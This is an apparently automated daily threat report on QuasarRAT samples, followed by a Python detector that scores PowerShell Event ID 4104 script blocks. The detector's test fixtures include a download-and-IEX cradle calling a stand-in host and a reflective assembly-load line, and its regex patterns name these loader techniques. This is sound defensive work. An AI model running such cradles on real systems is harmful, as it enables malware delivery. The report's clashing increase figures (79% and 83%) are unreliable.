QuasarRAT - Daily Threat Report

Sunday, April 26, 2026

Daily Summary

QuasarRAT activity surged today with 11 new samples collected, marking a 79% increase over the 7-day average of 6. This rise continues an escalating trend, suggesting renewed campaign activity or an increased operational tempo from threat actors. The spike is significant enough to warrant heightened monitoring by SOC teams.

New Samples Detected

Today’s 11 samples break down by file type as follows: PowerShell scripts (.ps1) dominate with 5 samples, followed by executable files (.exe) with 3, batch scripts (.bat) with 2, and VBScript (.vbs) with 1. The heavy reliance on .ps1 files is noteworthy, as QuasarRAT typically favors compiled executables for initial payloads. This shift may indicate threat actors are leveraging living-off-the-land techniques, using PowerShell to load the RAT in memory and evade static file detections.

Distribution Methods

Based on the file type distribution, delivery appears to be shifting away from direct executable drops and toward script-based attack chains. The .ps1 samples likely serve as downloaders or in-memory loaders, while the .bat and .vbs files may be used for persistence or staging. This aligns with recent phishing campaigns in which malicious scripts are attached to emails or hosted on file-sharing services. No download URLs were observed in today’s IOCs, but the script-heavy approach suggests the actual payloads are fetched from remote servers during execution.

Detection Rate

Current AV engines are likely catching many legacy QuasarRAT variants, but the shift to script-based distribution may reduce detection rates. PowerShell-based loaders can bypass signature scans by encoding payloads or using reflection to load assemblies. SOC teams should verify that their EDR solutions have behavioral rules for suspicious PowerShell execution, as traditional file scanners may miss these new variants.

C2 Infrastructure

No new C2 servers were observed today, and no geographic patterns emerged from the 11 new IOCs. The lack of fresh C2 infrastructure suggests threat actors are reusing existing servers or cycling through previously known hosts. This could indicate a focus on payload delivery and execution rather than C2 operations, or that C2 data is being withheld from current collection.

7-Day Trend

Today’s 11 samples break a week of relatively stable counts near the mean. Activity is clearly ramping up, with the 83% increase from the average pointing to an active campaign that may continue into the coming days.

Security Analysis

A non-obvious observation: the dominance of .ps1 files over .exe files represents a notable tactic shift for QuasarRAT. Historically, this family is dropped as a compiled executable, often bundled with legitimate software or disguised as a software crack. Today’s data suggests actors are moving to a multi-stage execution model in which the initial script downloads the RAT binary from a remote host. This improves operational security for the attacker, as the initial payload is more difficult to analyze statically. Actionable recommendation: implement PowerShell execution policy restrictions and monitor PowerShell Event ID 4104 (Script Block Logging) events for suspicious invocation patterns. Block outbound connections from PowerShell to uncommon ports or domains, and ensure your SOC has visibility into script-derived process trees.
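As an added example (not part of this report and not code from the data sources it cites), the following Python triages Event ID 4104 records for the loader behaviours the report describes: remote payload fetches, reflective assembly loading, and encoded or base64-decoded content. It parses the script block text out of Windows event XML (the format produced by Event Viewer exports and Windows Event Forwarding), scores each block against a weighted indicator list, and raises an alert when the score reaches a threshold. The event records are constructed fixtures, and the indicator names, weights and threshold are assumptions to tune against your own PowerShell baseline.

```python
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from xml.sax.saxutils import escape

# Windows event schema namespace used in exported and forwarded event XML.
EVT_NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"

# Script block behaviours the report calls out: reflective load, nested launch
# with an encoded command, remote fetch, dynamic evaluation, base64 decoding,
# hidden windows. Names and weights are assumptions, not a vendor ruleset.
INDICATORS = [
    ("reflection_load", re.compile(r"\[System\.Reflection\.Assembly\]::Load", re.I), 3),
    ("nested_encoded_launch",
     re.compile(r"powershell(?:\.exe)?[^\n]*\s-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I), 3),
    ("remote_download",
     re.compile(r"\b(?:DownloadString|DownloadFile|Invoke-WebRequest|iwr|Invoke-RestMethod)\b", re.I), 2),
    ("invoke_expression", re.compile(r"\b(?:Invoke-Expression|IEX)\b", re.I), 2),
    ("base64_decode", re.compile(r"FromBase64String", re.I), 1),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 1),
]
ALERT_THRESHOLD = 4  # assumption: tune to the environment's baseline


@dataclass
class ScriptBlockEvent:
    record_id: int
    script_block_id: str
    text: str


def parse_4104(xml_text):
    """Extract the ScriptBlockText from one event XML record.
    Returns None for records that are not Event ID 4104."""
    root = ET.fromstring(xml_text)
    if root.findtext(f"./{EVT_NS}System/{EVT_NS}EventID") != "4104":
        return None
    record_id = int(root.findtext(f"./{EVT_NS}System/{EVT_NS}EventRecordID"))
    data = {d.get("Name"): (d.text or "") for d in root.iter(f"{EVT_NS}Data")}
    return ScriptBlockEvent(record_id, data.get("ScriptBlockId", ""), data.get("ScriptBlockText", ""))


def score_event(ev):
    """Return (score, matched indicator names) for one script block."""
    hits = [(name, w) for name, rx, w in INDICATORS if rx.search(ev.text)]
    return sum(w for _, w in hits), [name for name, _ in hits]


def triage(xml_records, threshold=ALERT_THRESHOLD):
    """Parse 4104 records and return alert dicts for blocks at or above threshold."""
    alerts = []
    for xml_text in xml_records:
        ev = parse_4104(xml_text)
        if ev is None:
            continue
        score, hits = score_event(ev)
        if score >= threshold:
            alerts.append({"record_id": ev.record_id, "script_block_id": ev.script_block_id,
                           "score": score, "indicators": hits})
    return alerts


def make_event_xml(record_id, event_id, script_text,
                   block_id="00000000-0000-0000-0000-000000000000"):
    """Build a minimal event XML record (constructed test fixture, not a real log export)."""
    return (
        f'<Event xmlns="{EVT_NS[1:-1]}"><System><EventID>{event_id}</EventID>'
        f'<EventRecordID>{record_id}</EventRecordID></System><EventData>'
        f'<Data Name="ScriptBlockText">{escape(script_text)}</Data>'
        f'<Data Name="ScriptBlockId">{block_id}</Data></EventData></Event>'
    )


# Constructed sample records: benign admin blocks, two loader-style blocks,
# and one non-4104 event that the parser must skip. Hosts use .invalid.
SAMPLE_RECORDS = [
    make_event_xml(1, 4104, "Get-ChildItem -Path C:\\Logs | Where-Object { $_.Length -gt 1MB }"),
    make_event_xml(2, 4104, "$b = (New-Object Net.WebClient).DownloadString('http://stage.example.invalid/a'); IEX $b"),
    make_event_xml(3, 4104, "$bytes = [Convert]::FromBase64String($blob); [System.Reflection.Assembly]::Load($bytes)"),
    make_event_xml(4, 4104, "Invoke-WebRequest -Uri https://updates.example.invalid/agent.msi -OutFile C:\\Temp\\agent.msi"),
    make_event_xml(5, 4103, "Write-Host 'pipeline log, not a script block'"),
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_RECORDS):
        print(alert)
```

Record 4 shows why the scoring is weighted rather than a single-pattern match: a plain Invoke-WebRequest to fetch an installer is routine administration and stays below the threshold, while a fetch piped into IEX, or a base64 blob handed to Assembly.Load, crosses it. Script blocks longer than the event size limit arrive split across several 4104 records sharing one ScriptBlockId, so in production the text should be reassembled by that id before scoring.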

Further Reading

Data Sources

MalwareBazaar (abuse.ch)
ThreatFox (abuse.ch)
URLhaus (abuse.ch)
